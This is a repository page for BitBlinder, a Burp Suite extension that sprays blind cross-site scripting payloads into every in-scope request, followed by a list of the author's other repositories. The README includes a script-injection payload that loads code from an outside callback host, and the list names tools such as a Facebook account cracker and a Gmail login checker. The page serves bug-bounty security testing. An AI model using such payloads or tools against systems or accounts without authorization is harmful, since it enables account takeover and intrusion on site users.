• Stars
    star
    106
  • Rank 325,871 (Top 7 %)
  • Language
    Python
  • Created almost 6 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities

BitBlinder

THIS TOOLS IS IN EARLY BETA USE IT ON YOUR OWN RISK
Burp extension helps in finding blind xss vulnerabilities by injecting xss payloads in every request passes throw BurpSuite

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
-  Developer: Ahmed Ezzat (BitTheByte)      -
-  Github:    https://github.com/BitTheByte -
-  Version:   0.05b                         -
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
[WARNING] MAKE SURE TO EDIT THE SETTINGS BEFORE USE
[WARNING] THIS TOOL WILL WORK FOR IN-SCOPE ITEMS ONLY
[WARNING] THIS TOOL WILL CONSUME TOO MUCH BANDWIDTH

Configuration

Go to Bit blinder tab then enable it
Set your payloads (line separated)

"><script%20src="https://myusername.xss.ht"><script>
"><script%20src="https://myusername.xss.ht"><script>
...

If you added more than 1 payload enable the randomization button
If you want to keep it disabled keep in mind that the tool will use the first payload only

How to use

  1. Load the extension to your burpsuite
  2. Click on Bit blinder tab then enable it
  3. Add your target to scope It'll only work for inscope items
  4. Continue your hunting session Make sure to do alot of actions [Forms,Search,...]
  5. Monitor the output in extension's output tab

Note: By the nature of this tool it'll make alot of requests so you may get blocked by WAF or experience slow internet connection

In a nutshell

When user visits https://example.com?vuln=123&vuln2=abc
This tool will generate the following 2 requests (in the background without effecting the current session)

  1. https://example.com?vuln=[YOUR_XSS_PAYLOAD]&vuln2=abc
  2. https://example.com?vuln=123&vuln2=[YOUR_XSS_PAYLOAD]

The previous example also applies to POST parameters

Current version

Version 0.05b

TO-DO (By priority)

  • GUI βœ“ ( A very ugly one for now.. )
  • Fix endless request loops βœ“
  • Injection in headers
  • Option to exclude paramters/hosts/endpoints
  • Better output/logging system

More Repositories

1

YouTubeShop

Youtube autolike and autosubs script
Python
307
star
2

Monitorizer

Monitoring framework to detect and report newly found subdomains on a specific target using various scanning tools
Python
255
star
3

Eagle

Multithreaded Plugin based vulnerability scanner for mass detection of web-based applications vulnerabilities
Python
107
star
4

Domainker

BugBounty Tool
Python
39
star
5

BitMapper

Burp-suite Extension For finding .map files
Python
39
star
6

GmailChecker

Youtube or Gmail login checker
Python
31
star
7

BitTraversal

Burpsuite Plugin to detect Directory Traversal vulnerabilities
Java
28
star
8

Orkestra

Web-based Android debugger with inspection capabilities using Frida and Jadx as a backbone
Python
27
star
9

WayRobots

Tool to find stored robots.txt files from the past
Python
16
star
10

Watcherizer

Slack Bot for monitoring websites for codebase changes
Python
14
star
11

Awesome-collisions

Collection of vulnerable functions
10
star
12

XML-Finder

[XXE TOOL] Burp suite extension to detect requests contains XML
Python
9
star
13

FacebookCracker

python cracker for facebook accounts
Python
7
star
14

ModernCryptoLib

Python cryptography library
Python
6
star
15

Facebook-Toolkit

Facebook Python API
Python
5
star
16

Needle

Wrapper around python threading/concurrent module allowing fast development of threaded python applications
Python
5
star
17

CTF-Writeup

Python
5
star
18

BitDefined

Chrome based extension to list custom defined javascript types
JavaScript
5
star
19

Pybook

Facebook messages reply framework
Python
3
star
20

LetsFoolBots

Python
3
star
21

Web-Spider

Python Web Spider
Python
2
star
22

YoutubeAPI

Youtube api for bots
PHP
2
star
23

Image-Reader

Python OCR program to read text within images
2
star
24

PyVM

Custom Python based VM
Python
1
star
25

PySafe

Python code protector
Python
1
star
26

bitthebyte.github.io

CSS
1
star
27

sms-beta-website

JavaScript
1
star
28

Jsepy

Little python GUI framework
Python
1
star
29

Awesome-SubSystem

Shell
1
star
30

Helpers

Python
1
star